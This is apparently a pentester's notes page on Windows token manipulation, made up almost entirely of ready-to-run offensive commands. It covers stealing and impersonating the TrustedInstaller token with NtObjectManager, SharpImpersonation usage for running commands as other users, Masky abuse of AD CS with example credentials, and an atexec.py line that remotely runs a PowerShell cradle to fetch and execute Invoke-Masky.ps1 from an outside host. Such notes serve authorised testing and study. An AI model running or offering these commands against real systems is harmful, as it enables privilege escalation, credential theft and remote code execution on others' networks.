Token Manipulation | Pentester's Promiscuous Notebook

Pentester's Promiscuous Notebook

Twitter GitHub Blog

Trusted Installer Token

PS > Install-Module -Name NtObjectManager -Confirm:$false
PS > Restart-Service TrustedInstaller
PS > $procId = (Get-Process TrustedInstaller).Id
PS > $token = Get-NtTokenFromProcess -ProcessId $procId
PS > $current = Get-NtThread -Current -PseudoHandle
PS > $ctx = $current.Impersonate($token)
PS > $impToken = Get-NtToken -Impersonation
PS > $impToken.Groups

Impersonate to Request an ST

Tools

Tokenvator

SharpImpersonation

PS > .\SharpImpersonation.exe list [elevated]
PS > .\SharpImpersonation.exe list user:PC01\snovvcrash binary:"powershell.exe whoami"
PS > .\SharpImpersonation.exe list user:PC01\snovvcrash technique:ImpersonateLoggedOnuser

Koh

Masky

Combining with AD CS abuse:

$ pipx install -f 'git+https://github.com/Z4kSec/Masky.git'
$ masky -d tinycorp -u snovvcrash -p 'Passw0rd!' -ca 'CA01.megacorp.local\CorpCA' -dc-ip 192.168.1.11 10.10.13.37
$ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'powershell iex(new-object net.webclient).downloadstring(""""http://10.10.13.37/Invoke-Masky.ps1"""");Invoke-Masky /ca:CA01.megacorp.local\CorpCA'

Impersonate